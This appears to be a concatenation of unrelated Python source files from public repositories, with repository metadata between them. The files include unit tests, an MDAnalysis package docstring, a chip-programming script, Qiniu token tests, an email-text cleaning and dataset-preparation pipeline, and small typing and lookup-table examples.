import unittest from index import update_inverted_index __author__ = 'guoyong' class IndexTest(unittest.TestCase): def setUp(self): self.index = { 'python': [] } def test_update_inverted_index_empty(self): update_inverted_index(self.index, 'python', 1, 2, 3) self.assertEqual([1, 2, 3], self.index.get('python')) def test_update_inverted_index_duplicate_item(self): update_inverted_index(self.index, 'python', 1, 2, 3) update_inverted_index(self.index, 'python', 3) self.assertEqual([1, 2, 3], self.index.get('python')) def test_update_inverted_index_sorted(self): update_inverted_index(self.index, 'python', 3, 1, 2) self.assertEqual([1, 2, 3], self.index.get('python'))
1.5
2
venv/lib/python3.7/site-packages/MDAnalysis/analysis/__init__.py
dtklinh/GBRDE
2
12757803
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*- # vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 # # MDAnalysis --- https://www.mdanalysis.org # Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors # (see the file AUTHORS for the full list of names) # # Released under the GNU Public Licence, v2 or any higher version # # Please cite your use of MDAnalysis in published work: # # <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, # <NAME>, <NAME>, <NAME>, <NAME>, and <NAME>. # MDAnalysis: A Python package for the rapid analysis of molecular dynamics # simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th # Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy. # doi: 10.25080/majora-629e541a-00e # # <NAME>, <NAME>, <NAME>, and <NAME>. # MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations. # J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787 # """ :mod:`MDAnalysis.analysis` --- Analysis code based on MDAnalysis ================================================================ The :mod:`MDAnalysis.analysis` sub-package contains various recipes and algorithms that can be used to analyze MD trajectories. If you use them please check if the documentation mentions any specific caveats and also if there are any published papers associated with these algorithms. Available analysis modules -------------------------- :mod:`~MDAnalysis.analysis.align` Fitting and aligning of coordinate frames, including the option to use a sequence alignment to define equivalent atoms to fit on. :mod:`~MDAnalysis.analysis.contacts` Analyse the number of native contacts relative to a reference state, also known as a "q1-q2" analysis. :mod:`~MDAnalysis.analysis.density` Creating and manipulating densities such as the density ow water molecules around a protein. Makes use of the external GridDataFormats_ package. :mod:`~MDAnalysis.analysis.distances` Functions to calculate distances between atoms and selections; it contains the often-used :func:`~MDAnalysis.analysis.distances.distance_array` function. :mod:`~MDAnalysis.analysis.hbonds` Analyze hydrogen bonds, including both the per frame results as well as the dynamic properties and lifetimes. :mod:`~MDAnalysis.analysis.helanal` Analysis of helices with the HELANAL_ algorithm. :mod:`~MDAnalysis.analysis.hole` Run and process output from the :program:`HOLE` program to analyze pores, tunnels and cavities in proteins. :mod:`~MDAnalysis.analysis.gnm` Gaussian normal mode analysis of MD trajectories with the help of an elastic network. :mod:`~MDAnalysis.analysis.leaflet` Find lipids in the upper and lower (or inner and outer) leaflet of a bilayer; the algorithm can deal with any deformations as long as the two leaflets are topologically distinct. :mod:`~MDAnalysis.analysis.nuclinfo` Analyse the nucleic acid for the backbone dihedrals, chi, sugar pucker, and Watson-Crick distance (minor and major groove distances). :mod:`~MDAnalysis.analysis.psa` Perform Path Similarity Analysis (PSA) on a set of trajectories to measure their mutual similarities, including the ability to perform hierarchical clustering and generate heat map-dendrogram plots. :mod:`~MDAnalysis.analysis.rdf` Calculation of pair distribution functions :mod:`~MDAnalysis.analysis.rms` Calculation of RMSD and RMSF. :mod:`~MDAnalysis.analysis.waterdynamics` Analysis of water. :mod:`~MDAnalysis.analysis.legacy.x3dna` Analysis of helicoidal parameters driven by X3DNA_. (Note that this module is not fully supported any more and needs to be explicitly imported from :mod:`MDAnalysis.analysis.legacy`.) .. _GridDataFormats: https://github.com/orbeckst/GridDataFormats .. _HELANAL: http://www.ccrnp.ncifcrf.gov/users/kumarsan/HELANAL/helanal.html .. _X3DNA: http://x3dna.org/ .. versionchanged:: 0.10.0 The analysis submodules are not automatically imported any more. Manually import any submodule that you need. .. versionchanged:: 0.16.0 :mod:`~MDAnalysis.analysis.legacy.x3dna` was moved to the :mod:`MDAnalysis.analysis.legacy` package """ __all__ = [ 'align', 'base', 'contacts', 'density', 'distances', 'gnm', 'hbonds', 'hydrogenbonds', 'helanal', 'hole', 'leaflet', 'nuclinfo', 'polymer', 'psa', 'rdf', 'rdf_s', 'rms', 'waterdynamics', ]
1.414063
1
the_complete_python_&_postgreSQL_developer_course/a_lottery_app/list_comprehension.py
supermonkeyparadise/python
0
12757931
<gh_stars>0 user_input = '5,4,25,18,22,9' user_numbers = user_input.split(',') user_numbers_as_int = [] for number in user_numbers: user_numbers_as_int.append(int(number)) print(user_numbers_as_int) print([number for number in user_numbers]) print([number*2 for number in user_numbers]) print([int(number) for number in user_numbers])
2.328125
2
program_chip.py
akashlevy/NI-RRAM-Python
0
12758059
"""Script to program a bitstream to a chip""" import argparse from nirram import NIRRAM # Get arguments parser = argparse.ArgumentParser(description="Program a bitstream to a chip.") parser.add_argument("chipname", help="chip name for logging") parser.add_argument("bitstream", help="bitstream file name") # Expect to receive two arg numbers when specifying a LRS (or HRS) range parser.add_argument("--lrs-range", nargs='+', type=float, default=[9e3, 11e3], help="target LRS") parser.add_argument("--hrs-range", nargs='+', type=float, default=[100e3, 1e9], help="target HRS") parser.add_argument("--start-addr", type=int, default=0, help="start addr") parser.add_argument("--end-addr", type=int, default=65536, help="end addr") parser.add_argument("--step-addr", type=int, default=1, help="addr step") parser.add_argument("--iterations", type=int, default=3, help="number of programming iterations") args = parser.parse_args() # Initialize NI system nisys = NIRRAM(args.chipname) # Read bitstream bitstream = open(args.bitstream).readlines() # Do operation across cells for i in range(args.iterations): for addr, bit in zip(range(args.start_addr, args.end_addr, args.step_addr), bitstream): nisys.set_addr(addr) bit = int(bit.strip()) if bit == 0: # bit 0: LRS target = nisys.target(args.lrs_range[0], args.lrs_range[1]) if bit == 1: # bit 1: HRS target = nisys.target(args.hrs_range[0], args.hrs_range[1]) print(f"Iteration {i}, Address {addr}: {target}") # Shutdown nisys.close()
2.46875
2
PyDarkLogic/MainDarkLogic/action.py
BlackWalker01/BlackLogic
6
12758187
<filename>PyDarkLogic/MainDarkLogic/action.py<gh_stars>1-10 class Action: def __init__(self, fun, id=None): self._fun = fun self._id = id def fun(self): return self._fun def id(self): return self._id
0.902344
1
qiniu/rs/test/rs_token_test.py
jeremybai/Easylink
1
12758315
<filename>qiniu/rs/test/rs_token_test.py # -*- coding: utf-8 -*- import unittest import os import json from base64 import urlsafe_b64decode as decode from base64 import urlsafe_b64encode as encode from hashlib import sha1 import hmac import urllib from qiniu import conf from qiniu import rs conf.ACCESS_KEY = os.getenv("QINIU_ACCESS_KEY") conf.SECRET_KEY = os.getenv("QINIU_SECRET_KEY") bucket_name = os.getenv("QINIU_TEST_BUCKET") domain = os.getenv("QINIU_TEST_DOMAIN") key = 'QINIU_UNIT_TEST_PIC' class TestToken(unittest.TestCase): def test_put_policy(self): policy = rs.PutPolicy(bucket_name) policy.endUser = "hello!" policy.returnUrl = "http://localhost:1234/path?query=hello" policy.returnBody = "$(sha1)" # Do not specify the returnUrl and callbackUrl at the same time policy.callbackUrl = "http://1.2.3.4/callback" policy.callbackBody = "$(bucket)" policy.saveKey = "$(sha1)" policy.insertOnly = 1 policy.detectMime = 1 policy.fsizeLimit = 1024 policy.persistentNotifyUrl = "http://4.3.2.1/persistentNotifyUrl" policy.persistentOps = "avthumb/flash" tokens = policy.token().split(':') # chcek first part of token self.assertEqual(conf.ACCESS_KEY, tokens[0]) data = json.loads(decode(tokens[2])) # check if same self.assertEqual(data["scope"], bucket_name) self.assertEqual(data["endUser"], policy.endUser) self.assertEqual(data["returnUrl"], policy.returnUrl) self.assertEqual(data["returnBody"], policy.returnBody) self.assertEqual(data["callbackUrl"], policy.callbackUrl) self.assertEqual(data["callbackBody"], policy.callbackBody) self.assertEqual(data["saveKey"], policy.saveKey) self.assertEqual(data["exclusive"], policy.insertOnly) self.assertEqual(data["detectMime"], policy.detectMime) self.assertEqual(data["fsizeLimit"], policy.fsizeLimit) self.assertEqual( data["persistentNotifyUrl"], policy.persistentNotifyUrl) self.assertEqual(data["persistentOps"], policy.persistentOps) new_hmac = encode(hmac.new(conf.SECRET_KEY, tokens[2], sha1).digest()) self.assertEqual(new_hmac, tokens[1]) def test_get_policy(self): base_url = rs.make_base_url(domain, key) policy = rs.GetPolicy() private_url = policy.make_request(base_url) f = urllib.urlopen(private_url) body = f.read() f.close() self.assertEqual(len(body) > 100, True) class Test_make_base_url(unittest.TestCase): def test_unicode(self): url1 = rs.make_base_url('1.com', '你好') url2 = rs.make_base_url('1.com', u'你好') assert url1 == url2 if __name__ == "__main__": unittest.main()
1.492188
1
src/prepare.py
microsoft/verseagility
15
12758443
""" PREPARE Before running train, you need to run prepare.py with the respective task. Example (in the command line): > cd to root dir > conda activate nlp > python src/prepare.py --do_format --task 1 """ #NOTE: the following is a workaround for AML to load modules import os, sys; sys.path.append(os.path.dirname(os.path.realpath(__file__))) import os import spacy import pandas as pd import numpy as np import string import re import argparse from sklearn.model_selection import StratifiedShuffleSplit # Custom functions import sys sys.path.append('./src') import helper as he import data as dt import custom as cu logger = he.get_logger(location=__name__) class Clean(): """Text preprocessing and cleaning steps SUPPORTED LANGUAGES - EN - DE - IT - ES - FR - XX (multi - NER only) SUPPORTED MODULES - Remove Noise Remove formatting and other noise that may be contained in emails or other document types. - Get Placeholders Placeholders for common items such as dates, times, urls but also custom customer IDs. - Remove Stopwords Stopwords can be added by adding a language specific stopword file to /assets. Format: "assets/stopwords_<language>.txt". - Lemmatize """ def __init__(self, task, download_source=False, download_train=False, inference=False): self.task = task self.language = cu.params.get('language') # Load data class self.dt = dt.Data(task=self.task, inference=inference) # Download data, if needed if download_train: self.dt.download('data_dir', dir = 'data_dir', source = 'datastore') # Load spacy model self.nlp = he.load_spacy_model(language=self.language, disable=['ner','parser','tagger']) # Create stopword list stopwords_active = [] ## Load names try: names = self.dt.load('fn_names', dir = 'asset_dir', file_type = 'list') stopwords_active = stopwords_active + names except FileNotFoundError as e: logger.warning(f'[WARNING] No names list loaded: {e}') ## Load stopwords try: stopwords = self.dt.load('fn_stopwords', dir = 'asset_dir', file_type = 'list') stopwords_active = stopwords_active + stopwords except FileNotFoundError as e: logger.warning(f'[WARNING] No stopwords list loaded: {e}') ## Add to Spacy stopword list logger.warning(f'[INFO] Active stopwords list lenght: {len(stopwords_active)}') for w in stopwords_active: self.nlp.vocab[w.replace('\n','')].is_stop = True def remove(self, line, rm_email_formatting=False, rm_email_header=False, rm_email_footer=False, rm_punctuation=False): """Remove content from text""" if not isinstance(line, str): line = str(line) # Customer Remove line = cu.remove(line) if rm_email_formatting: line = re.sub(r'<[^>]+>', ' ', line) # Remove HTML tags line = re.sub(r'^(.*\.eml)', ' ', line) # remove header for system generated emails if rm_email_header: #DE/EN if self.language == 'en' or self.language == 'de': line = re.sub(r'\b(AW|RE|VON|WG|FWD|FW)(\:| )', '', line, flags=re.I) #DE if self.language == 'de': line = re.sub(r'(Sehr geehrte( Damen und Herren.)?.)|hallo.|guten( tag)?.', '', line, flags=re.I) if rm_email_footer: #EN if self.language == 'en': line = re.sub(r'\bkind regards.*', '', line, flags=re.I) #DE if self.language == 'de': line = re.sub(r'\b(mit )?(beste|viele|liebe|freundlich\w+)? (gr[u,ü][ß,ss].*)', '', line, flags=re.I) line = re.sub(r'\b(besten|herzlichen|lieben) dank.*', '', line, flags=re.I) line = re.sub(r'\bvielen dank für ihr verständnis.*', '', line, flags=re.I) line = re.sub(r'\bvielen dank im voraus.*', '', line, flags=re.I) line = re.sub(r'\b(mfg|m\.f\.g) .*','', line, flags=re.I) line = re.sub(r'\b(lg) .*','',line, flags=re.I) line = re.sub(r'\b(meinem iPhone gesendet) .*','',line, flags=re.I) line = re.sub(r'\b(Gesendet mit der (WEB|GMX)) .*','',line, flags=re.I) line = re.sub(r'\b(Diese E-Mail wurde von Avast) .*','',line, flags=re.I) # Remove remaining characters ##NOTE: may break other regex if rm_punctuation: line = re.sub('['+string.punctuation+']',' ',line) return line def get_placeholder(self, line, rp_generic=False, rp_custom=False, rp_num=False): """Replace text with type specfic placeholders""" # Customer placeholders line = cu.get_placeholder(line) # Generic placeholder if rp_generic: line = re.sub(r' \+[0-9]+', ' ', line) # remove phone numbers line = re.sub(r'0x([a-z]|[0-9])+ ',' PER ',line, re.IGNORECASE) # replace line = re.sub(r'[0-9]{2}[\/.,:][0-9]{2}[\/.,:][0-9]{2,4}', ' PDT ', line) # remove dates and time, replace with placeholder line = re.sub(r'([0-9]{2,3}[\.]){3}[0-9]{1,3}',' PIP ',line) # replace ip with placeholder line = re.sub(r'[0-9]{1,2}[\/.,:][0-9]{1,2}', ' PTI ', line) # remove only time, replace with placeholder line = re.sub(r'[\w\.-]+@[\w\.-]+', ' PEM ', line) # remove emails line = re.sub(r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&amp;+]|[!*\(\),]|(?:%[0-9a-f][0-9a-f]))+', ' PUR ', line) # Remove links line = re.sub(r'€|\$|(USD)|(EURO)', ' PMO ', line) # Placeholders for numerics if rp_num: line = re.sub(r' ([0-9]{4,30}) ',' PNL ', line) # placeholder for long stand alone numbers line = re.sub(r' [0-9]{2,3} ',' PNS ', line) # placeholder for short stand alone numbers return line def tokenize(self, line, lemmatize = False, rm_stopwords = False): """Tokenizer for non DL tasks""" if not isinstance(line, str): line = str(line) if lemmatize and rm_stopwords: line = ' '.join([t.lemma_ for t in self.nlp(line) if not t.is_stop]) elif lemmatize: line = ' '.join([t.lemma_ for t in self.nlp(line)]) elif rm_stopwords: line = ' '.join([t.text for t in self.nlp(line) if not t.is_stop]) return line def transform(self, texts, to_lower = False, # Remove rm_email_formatting = False, rm_email_header = False, rm_email_footer = False, rm_punctuation = False, # Placeholders rp_generic = False, rp_num = False, # Tokenize lemmatize = False, rm_stopwords = False, return_token = False, # Whitespace remove_whitespace = True ): """Main run function for cleaning process""" if isinstance(texts, str): texts = [texts] # Convert to series for improved efficiency df_texts = pd.Series(texts) # Avoid loading errors df_texts = df_texts.replace('\t', ' ', regex=True) # Remove noise if any((rm_email_formatting, rm_email_header, rm_email_footer, rm_punctuation)): df_texts = df_texts.apply(lambda x: self.remove(x, rm_email_formatting = rm_email_formatting, rm_email_header = rm_email_header, rm_email_footer = rm_email_footer, rm_punctuation = rm_punctuation)) # Replace placeholders if any((rp_generic, rp_num)): df_texts = df_texts.apply(lambda x: self.get_placeholder(x, rp_generic = rp_generic, rp_num = rp_num)) # Tokenize text if any((lemmatize, rm_stopwords, return_token)): df_texts = df_texts.apply(self.tokenize, lemmatize = lemmatize, rm_stopwords = rm_stopwords) # To lower if to_lower: df_texts = df_texts.apply(str.lower) # Remove spacing if remove_whitespace: df_texts = df_texts.apply(lambda x: " ".join(x.split())) # Return Tokens if return_token: return [t.split(' ') for t in df_texts.to_list()] else: return df_texts.to_list() def transform_by_task(self, text): # CUSTOM FUNCTION if cu.tasks.get(str(self.task)).get('type') == 'classification': return self.transform(text, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rp_generic = True)[0] elif cu.tasks.get(str(self.task)).get('type') == 'multi_classification': return self.transform(text, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rp_generic = True)[0] elif cu.tasks.get(str(self.task)).get('type') == 'ner': return text[0] elif cu.tasks.get(str(self.task)).get('type') == 'qa': return self.transform(text, to_lower = True, # Remove rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rm_punctuation = True, # Placeholders rp_generic = True, rp_num = True, # Tokenize lemmatize = True, rm_stopwords = True, return_token = True )[0] else: logger.warning('[WARNING] No transform by task found.') return text[0] def prepare_classification(task, do_format, train_split, min_cat_occurance, min_char_length, register_data): # Get clean object cl = Clean(task=task, download_source=True) # Load data if not os.path.isfile(cl.dt.get_path('fn_prep', dir = 'data_dir')) or do_format: data = dt.get_dataset(cl, source="cdb") else: data = cl.dt.load('fn_prep', dir = 'data_dir') logger.warning(f'Data Length : {len(data)}') # Load text & label field text_raw = cu.load_text(data) data['label'] = cu.load_label(data, task) if cu.tasks.get(str(task)).get('type') == 'multi_classification': data['label'] = data['label'].str.replace(', ', '_').str.replace(' ', '_') flat_labels = [row['label'].split(',') for index, row in data.iterrows()] labels_clean = [] for labels in flat_labels: for label in labels: labels_clean.append(label) label_list_raw = pd.DataFrame({'label':labels_clean}) label_list_raw = label_list_raw[label_list_raw.label != ''] label_list_raw = label_list_raw.label.drop_duplicates() elif cu.tasks.get(str(task)).get('type') == 'classification': # in case of single label classification label_list_raw = data.label.drop_duplicates() # Clean text data['text'] = cl.transform(text_raw, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rp_generic = True) # Filter by length data = he.remove_short(data, 'text', min_char_length=min_char_length) logger.warning(f'Data Length : {len(data)}') # Remove duplicates data_red = data.drop_duplicates(subset=['text']) logger.warning(f'Data Length : {len(data_red)}') # Min class occurance if cu.tasks.get(str(task)).get('type') == 'classification': data_red = data_red[data_red.groupby('label').label.transform('size') > min_cat_occurance] elif cu.tasks.get(str(task)).get('type') == 'multi_classification': # Split rows data_transform = data_red[['id', 'label']].copy() data_transform['label'] = [row['label'].split(",") for index, row in data_transform.iterrows()] # pipe it to list data_transform = pd.DataFrame({'index':data_transform.index.repeat(data_transform.label.str.len()), 'label':np.concatenate(data_transform.label.values)}) # explode df data_transform = data_transform[data_transform.groupby('label').label.transform('size') > min_cat_occurance] # count for min occurance and only keep relevant ones data_transform = data_transform.groupby(['index'])['label'].apply(lambda x: ','.join(x.astype(str))).reset_index() # re-merge data_transform = data_transform.set_index('index') del data_red['label'] data_red = pd.concat([data_red, data_transform], join='inner', axis=1) logger.warning(f'Data Length : {len(data_red)}') data_red = data_red.tail(300000).reset_index(drop=True).copy() #TODO: .tail() temp is for debugging ## There is a memory issue for the EN dataset, due to its size. Needs further investigation. # Label list if cu.tasks.get(str(task)).get('type') == 'multi_classification': # 2 = task for multi-label classification flat_labels = [row['label'].split(',') for index, row in data_red.iterrows()] labels_clean = [] for labels in flat_labels: for label in labels: labels_clean.append(label) label_list = pd.DataFrame({'label':labels_clean}) label_list = label_list[label_list.label != ''] label_list = label_list.label.drop_duplicates() elif cu.tasks.get(str(task)).get('type') == 'classification': # in case of single label classification label_list = data_red.label.drop_duplicates() logger.warning(f'Excluded labels: {list(set(label_list_raw)-set(label_list))}') # Split data strf_split = StratifiedShuffleSplit(n_splits = 1, test_size=(1-train_split), random_state=200) if cu.tasks.get(str(task)).get('type') == 'classification': for train_index, test_index in strf_split.split(data_red, data_red['label']): df_cat_train = data_red.loc[train_index] df_cat_test = data_red.loc[test_index] elif cu.tasks.get(str(task)).get('type') == 'multi_classification': for train_index, test_index in strf_split.split(data_red, pd.DataFrame({'label':[l.split(',')[0] for l in data_red['label']]})['label']): df_cat_train = data_red.loc[train_index] df_cat_test = data_red.loc[test_index] # Save data cl.dt.save(data_red, fn = 'fn_clean', dir = 'data_dir') cl.dt.save(df_cat_train[['text','label']], fn = 'fn_train', dir = 'data_dir') cl.dt.save(df_cat_test[['text','label']], fn = 'fn_test', dir = 'data_dir') cl.dt.save(label_list, fn = 'fn_label', header=False, dir = 'data_dir') # Upload data if register_data: cl.dt.upload('data_dir', destination='dataset') def prepare_ner(task, do_format, register_data): pass def prepare_qa(task, do_format, min_char_length, register_data): # Get clean object cl = Clean(task=task, download_source=True) # Load data if not os.path.isfile(cl.dt.get_path('fn_prep', dir = 'data_dir')) or do_format: data = dt.get_dataset(cl, source="cdb") else: data = cl.dt.load('fn_prep', dir = 'data_dir') logger.warning(f'Data Length : {len(data)}') # Filter relevant question answer pairs data = cu.filter_qa(data) logger.warning(f'Data Length : {len(data)}') # Load question & answer fields question, answer = cu.load_qa(data) # Clean text data['question_clean'] = cl.transform(question, to_lower = True, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rm_punctuation = True, rp_generic = True, rp_num = True, lemmatize = True, rm_stopwords = True ) data['answer_clean'] = cl.transform(answer, to_lower = True, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True, rm_punctuation = True, rp_generic = True, rp_num = True, lemmatize = True, rm_stopwords = True ) # For display data['answer_text_clean'] = cl.transform(answer, rm_email_formatting = True, rm_email_header = True, rm_email_footer = True ) # Filter by length data = he.remove_short(data, 'question_clean', min_char_length=min_char_length) logger.warning(f'Data Length : {len(data)}') # Remove duplicates data = data.drop_duplicates(subset=['question_clean']) logger.warning(f'Data Length : {len(data)}') data = data.reset_index(drop=True).copy() # Save data cl.dt.save(data, fn = 'fn_clean', dir = 'data_dir') # Upload data if register_data: cl.dt.upload('data_dir', destination='dataset') def main(task=1, do_format=False, split=0.9, min_cat_occurance=300, min_char_length=20, register_data=False): logger.warning(f'Running <PREPARE> for task {task}') task_type = cu.tasks.get(str(task)).get('type') if 'classification' == task_type: prepare_classification(task, do_format, split, min_cat_occurance, min_char_length, register_data) elif 'multi_classification' == task_type: prepare_classification(task, do_format, split, min_cat_occurance, min_char_length, register_data) elif 'ner' == task_type: prepare_ner(task, do_format, register_data) elif 'qa' == task_type: prepare_qa(task, do_format, min_char_length, register_data) else: logger.warning('[ERROR] TASK TYPE UNKNOWN. Nothing was processed.') def run(): """Run from the command line""" parser = argparse.ArgumentParser() parser.add_argument("--task", default=1, type=int, help="Task where: \ -task 1 : classification subcat \ -task 2 : classification cat \ -task 3 : ner \ -task 4 : qa") parser.add_argument('--do_format', action='store_true', help="Avoid reloading and normalizing data") parser.add_argument("--split", default=0.9, type=float, help="Train test split. Dev split is taken from train set.") parser.add_argument("--min_cat_occurance", default=300, type=int, help="Min occurance required by category.") parser.add_argument("--min_char_length", default=20, type=int, help="") parser.add_argument('--register_data', action='store_true', help="") args = parser.parse_args() main(args.task, args.do_format, args.split, min_cat_occurance=args.min_cat_occurance, min_char_length=args.min_char_length, register_data=args.register_data) if __name__ == '__main__': run()
1.625
2
section4/video1/union.py
PacktPublishing/Mastering-Python-3.x-3rd-Edition
6
12758571
<filename>section4/video1/union.py<gh_stars>1-10 from typing import Tuple, Iterable, Callable, Union Pair = Union[Tuple[int, int], Tuple[str, str]] Single = Union[int, str] def add(pair: Pair) -> Single: return pair[0] + pair[1] def even(a: Single) -> bool: if isinstance(a, str): return len(a) % 2 == 0 return a % 2 == 0 def map(func: Callable[[Pair], Single], objects: Iterable[Pair]) -> Iterable[Single]: return [func(x) for x in objects] def filter( func: Callable[[Single], bool], objects: Iterable[Single] ) -> Iterable[Single]: return [x for x in objects if func(x)] if __name__ == "__main__": print(filter(even, map(add, [(1, 2), (2, 2), (2, 1), (5, 1)]))) print(filter(even, map(add, [(1, 2), (2, 2), ("hello", "there"), (5, 1)])))
2.90625
3
RegonAPI/consts/voivodeships.py
damianwasik98/RegonAPI
10
12758699
<filename>RegonAPI/consts/voivodeships.py # Keys are ISO 3166-2:PL abbr. VOIVODESHIPS = { "DS": {"teryt": "02", "name_pl": "dolnośląskie"}, "KP": {"teryt": "04", "name_pl": "kujawsko-pomorskie"}, "LU": {"teryt": "06", "name_pl": "lubelskie"}, "LB": {"teryt": "08", "name_pl": "lubuskie"}, "LD": {"teryt": "10", "name_pl": "łódzkie"}, "MA": {"teryt": "12", "name_pl": "małopolskie"}, "MZ": {"teryt": "14", "name_pl": "mazowieckie"}, "OP": {"teryt": "16", "name_pl": "opolskie"}, "PK": {"teryt": "18", "name_pl": "podkarpackie"}, "PD": {"teryt": "20", "name_pl": "podlaskie"}, "PM": {"teryt": "22", "name_pl": "pomorskie"}, "SL": {"teryt": "24", "name_pl": "śląskie"}, "SK": {"teryt": "26", "name_pl": "świętokrzyskie"}, "WN": {"teryt": "28", "name_pl": "warmińsko-mazurskie"}, "WP": {"teryt": "30", "name_pl": "wielkopolskie"}, "ZP": {"teryt": "32", "name_pl": "zachodniopomorskie"}, }
0.796875
1
digits/model/tasks/test_caffe_train.py
PhysicsTeacher13/Digits-NVIDIA
111
12758827
# Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved. from __future__ import absolute_import from digits import test_utils def test_caffe_imports(): test_utils.skipIfNotFramework('caffe') import numpy # noqa import google.protobuf # noqa
0.472656
0